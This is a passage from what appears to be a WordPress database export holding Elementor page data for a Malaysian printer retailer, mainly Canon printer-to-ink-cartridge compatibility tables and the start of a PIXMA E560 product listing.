width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5481008\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1743741\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4cd6d01\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c780ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4256064\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"82113bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"28e331d\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3036540\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"65c34e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"900f258\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4dcfef7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9a95f08\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"57133d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5d1c072\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3bd5be\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"34c3d8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3db92dd\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b135c77\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b2ea947\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c47c3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"28f0e0b\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3881,2735,'_elementor_version','0.4'),(7167,3338,'_wp_page_template','template-fullwidth.php'),(7168,3338,'_elementor_edit_mode','builder'),(7169,3338,'_elementor_template_type','post'),(7170,3338,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" 